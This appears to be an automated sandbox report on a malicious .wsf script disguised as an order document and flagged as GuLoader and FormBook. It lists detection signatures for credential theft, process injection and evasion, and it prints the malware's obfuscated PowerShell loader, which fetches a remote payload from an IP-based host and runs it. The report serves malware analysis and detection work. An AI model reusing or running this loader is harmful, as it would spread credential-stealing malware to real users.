Edit tour
Windows
Analysis Report
Ordine_doc_419024001904.wsf
Overview
General Information
| Sample name: | Ordine_doc_419024001904.wsf |
| Analysis ID: | 1431462 |
| MD5: | 734c9d6b82b44237e5befe07faa4149b |
| SHA1: | b6a244eeb8ed209f2222b112cf2925f7eac7d1db |
| SHA256: | 4949351915c2627905d17fe54bb56341f0af23331257e235b79eaa876fcad8cf |
| Tags: | wsf |
| Infos: |   |
 | |
Detection
FormBook, GuLoader
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Potential malicious VBS script found (suspicious strings)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Queues an APC in another process (thread injection)
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 2276 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Ordin e_doc_4190 24001904.w sf" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
powershell.exe (PID: 2568 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "$Offence = 1;$Rabbi triesnteri msstyre='S ubstrin';$ Rabbitries nterimssty re+='g';Fu nction ads killigt($T egnedataba sen){$Beji g=$Tegneda tabasen.Le ngth-$Offe nce;For($R abbitries= 1; $Rabbit ries -lt $ Bejig; $Ra bbitries+= (2)){$Foun dlings+=$T egnedataba sen.$Rabbi triesnteri msstyre.In voke($Rabb itries, $O ffence);}$ Foundlings ;}function Apalachic ola($Speci eskbenes){ &($millear dtedele) ( $Specieskb enes);}$Fo lkedemokra ti=adskill igt 'IMHoA zAi.l l,aO / 5 .T0W S (,W,iUn,dg oBw,sH SND Te .1H0P.G 0,; RWPi n N6R4 ;N xM 6T4K;, CrU v :R1M2G1 . 0C) BGVe ,cEkBo,/,2 0,1,0 0E1 L0 1, LFUi Tr.enfko,x s/ 1A2U1Y. ,0L ';$God sterminale rs=adskill igt 'hUPsM e rT-.AAgU e,n tG ';$ Discredit= adskilligt 'Ghtt tJp :M/,/.8,7 F. 1.2,1.. U1 0 5S.M1 A6P3C/ AKc a riiFa,t ,r eA4S3,. cbhBm ';$ Trlbundnes =adskillig t ' >M ';$ milleardte dele=adski lligt 'TiU e.x ';$Phi llipeener = adskilli gt ' eScSh oS R%HaUp pEd ast a L%,\ B.aBl lHe pNrAe UsFs e r.e .s,. IfnNe K&E&M We. cAhSok .$ ';Apalachi cola (adsk illigt ' $ MgRlFoUb a Kl :MGMeBr CmKiEf.uUg Be.= (,cTm HdV /HcE . $UP hTiUl. lPiUpPe eS n.eDrA), ' );Apalachi cola (adsk illigt 's$ ,g l,o b a Klv:IBAaFr FrFa m uTn MdpaZsP= $ D i sNcUr eVd iFtS. TsLpSlDiTt U( $,T.r l Fb,uEn dQn eNs )S ') ;$Discredi t=$Barramu ndas[0];Ap alachicola (adskilli gt 'p$ gEl .oKbTaNlF: o,vUerr g Be nKe.r a .l i z iUn Rg =,N,eSw -.O b jTe cUtP .SFy us.tBevmD. N eEtG.sW BeFbOC.lKi eSnFt '); Apalachico la (adskil ligt 'W$ o .v e.rLgMe Mn.eUrJaGl DiPz iPn g P. H eNaGd Ae,rDsA[ $ PGEo d sPt Ae.r,mBiMn Ua lje,r s A]T=U$.F o .l kSeRd e ,mGoOkFrPa tPi ');$L ordlily=ad skilligt ' DoRv eArHg ueRn.eSrKa Sl iDzPiGn g .,DSoTw Fn,l.oBaRd F iSlHeP( $ D i,sBc rSe.dHitt K,I$,O z,o Pn.iTc,), ';$Lordlil y=$Germifu ge[1]+$Lor dlily;$Ozo nic=$Germi fuge[0];Ap alachicola (adskilli gt 'n$,g.l oSb a.la: Rf,eTrKsTk vLa n d,e n,eB=C(,T eVsSt -WP Ea tIh $M O z,oEn,iW c ) ');whi le (!$fers kvandene) {Apalachic ola (adski lligt ' $ g lVo bOaH l :FcRoum. p l e,m e, nAt eIr.= $ tJr u eB ') ;Apala chicola $L ordlily;Ap alachicola (adskilli gt ' S.t a ,rRtM- SDl LeNe.p 4T ');Apalac hicola (ad skilligt ' $Fg l,o b a l :Ff,e r sTkAv a nOd.eTn e ,= (TTSe.s t -LPTaLt Hh C$SO zB o.nIiOcA) ') ;Apalac hicola (ad skilligt ' U$ g l o b HaKl : E n eMr,vSeTr TeS=R$BgSl oBb.a.lH: FT eOr m o m eMtEr.e .n.eF+,+ % $ BPa r r a m uBnAd Na s .ScKo BuCn ts ') ;$Discred it=$Barram undas[$Ene rvere];}Ap alachicola (adskilli gt 'u$SgOl Wo,bCaNl : FTiTrTeFl To c kLs , =. UG eTtT -OC,o nRtl e,nAt $FO ,z o.nEiIc A ');Apala chicola (a dskilligt ',$Cg l oA bpaClP: LH iPt tPe rH